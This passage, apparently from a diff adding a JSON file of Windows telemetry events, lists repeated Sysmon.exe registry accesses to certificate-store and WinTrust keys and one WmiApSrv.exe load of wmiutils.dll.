"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483230000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + 
"registry_value": "Software Publishing", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": 
"CTLs", + "timestamp": 131883573483230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wmiutils.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wmiutils.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573483390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": 
